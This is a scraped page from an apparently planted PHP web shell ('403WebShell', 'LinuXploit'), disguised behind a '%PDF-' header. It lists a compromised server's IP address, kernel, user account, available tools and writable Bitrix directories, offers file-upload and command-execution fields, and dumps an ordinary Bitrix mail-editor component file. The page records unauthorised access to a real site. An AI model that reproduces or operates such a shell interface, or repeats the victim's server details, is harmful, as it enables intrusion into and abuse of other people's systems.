%PDF- %PDF- 403WebShell
403Webshell
Server IP : 37.220.80.31  /  Your IP : 18.191.39.181
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux 3051455-guretool.twc1.net 5.15.0-107-generic #117-Ubuntu SMP Fri Apr 26 12:26:49 UTC 2024 x86_64
User : www-root ( 1010)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/www-root/data/www/dev.artlot24.ru/bitrix/components/bitrix/sender.message.editor/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www-root/data/www/dev.artlot24.ru/bitrix/components/bitrix/sender.message.editor/class.php
<?php

use Bitrix\Main\Context;
use Bitrix\Main\Error;
use Bitrix\Main\ErrorCollection;
use Bitrix\Main\Localization\Loc;
use Bitrix\Sender\Access\ActionDictionary;
use Bitrix\Sender\Access\Map\MailingAction;
use Bitrix\Sender\Internals\CommonSenderComponent;
use Bitrix\Sender\Message;

if (!defined("B_PROLOG_INCLUDED") || B_PROLOG_INCLUDED !== true)
{
	die();
}

Loc::loadMessages(__FILE__);

class SenderMessageEditorComponent extends CommonSenderComponent
{
	/** @var ErrorCollection $errors */
	protected $errors;

	protected function checkRequiredParams()
	{
		if (!$this->arParams['MESSAGE_CODE'])
		{
			$this->errors->setError(new Error('Message code is not set.'));
		}

		return $this->errors->count() == 0;
	}

	protected function initParams()
	{
		$this->arParams['VALUE'] = isset($this->arParams['VALUE']) ? $this->arParams['VALUE'] : '';
		$this->arParams['MESSAGE_CODE'] = isset($this->arParams['MESSAGE_CODE']) ? $this->arParams['MESSAGE_CODE'] : null;
		$this->arParams['MESSAGE_ID'] = isset($this->arParams['MESSAGE_ID']) ? $this->arParams['MESSAGE_ID'] : null;
		$this->arParams['MESSAGE'] = isset($this->arParams['MESSAGE']) ? $this->arParams['MESSAGE'] : null;

		$this->arParams['TEMPLATE_TYPE'] = isset($this->arParams['TEMPLATE_TYPE']) ? $this->arParams['TEMPLATE_TYPE'] : null;
		$this->arParams['TEMPLATE_ID'] = isset($this->arParams['TEMPLATE_ID']) ? $this->arParams['TEMPLATE_ID'] : null;
		$this->arParams['IS_TRIGGER'] = isset($this->arParams['IS_TRIGGER']) ? (bool) $this->arParams['IS_TRIGGER'] :
			false;
		$this->arParams['CAN_EDIT'] = $this->arParams['CAN_EDIT']??
									$this->getAccessController()->check(
										MailingAction::getMap()[$this->arParams['MESSAGE_CODE']]
										);

		$isBus = !Bitrix\Main\Loader::includeModule('intranet');

		$baseUri = $isBus ? '/bitrix/admin/agreement_edit.php' : '/settings/configs/userconsent/';

		$this->arParams['CONSENT_PARAMS'] = [
			'PATH_TO_ADD' => $baseUri . ($isBus ? '?ID=0' : 'edit/0/'),
			'PATH_TO_EDIT' =>  $baseUri . ($isBus ? '?ID=#id#' : 'edit/#id#/') ,
			'PATH_TO_CONSENT_LIST' => $isBus ? '/bitrix/admin/agreement_consents.php?AGREEMENT_ID=#id#&apply_filter=Y' :
				$baseUri . 'consents/#id#/?AGREEMENT_ID=#id#&apply_filter=Y'
		];
	}

	protected function prepareResult()
	{
		$this->arResult['ACTION_URI'] = $this->getPath() . '/ajax.php';
		$this->arResult['SUBMIT_FORM_URL'] = Context::getCurrent()->getRequest()->getRequestUri();

		// init message
		$message = $this->arParams['MESSAGE'];
		if (!$message)
		{
			try
			{
				$message = Message\Adapter::getInstance($this->arParams['MESSAGE_CODE']);
				$message->loadConfiguration($this->arParams['MESSAGE_ID']);
			}
			catch (\Bitrix\Main\SystemException $exception)
			{
				$this->errors->setError(new Error(Loc::getMessage(
					'SENDER_MESSAGE_EDITOR_ERROR_UNKNOWN_CODE',
					array('%code%' => $this->arParams['MESSAGE_CODE'])
				)));

				return false;
			}
		}


		// get options list
		$configuration = $message->getConfiguration();
		$this->arResult['MESSAGE_VIEW'] = $configuration->getView();
		$this->arResult['LIST'] = array(
			array(
				'options' => Message\Configuration::convertToArray(
					$configuration->getOptionsByGroup(Message\ConfigurationOption::GROUP_DEFAULT)
				),
				'isAdditional' => false,
			)
		);

		$options = Message\Configuration::convertToArray(
			$configuration->getOptionsByGroup(Message\ConfigurationOption::GROUP_ADDITIONAL)
		);
		if (count($options) > 0)
		{
			$this->arResult['LIST'][] = array(
				'options' => $options,
				'isAdditional' => true,
			);
		}


		$this->arResult['IS_SUPPORT_TESTING'] = $message->getTester()->isSupport();
		$this->arResult['MESSAGE_CODE'] = $message->getCode();
		$this->arResult['MESSAGE_ID'] = $message->getId();

		return true;
	}

	protected function printErrors()
	{
		foreach ($this->errors as $error)
		{
			ShowError($error);
		}
	}

	public function executeComponent()
	{
		parent::executeComponent();
		parent::prepareResultAndTemplate();
	}

	public function getEditAction()
	{
		return $this->getViewAction();
	}

	public function getViewAction()
	{
		return ActionDictionary::ACTION_MAILING_VIEW;
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit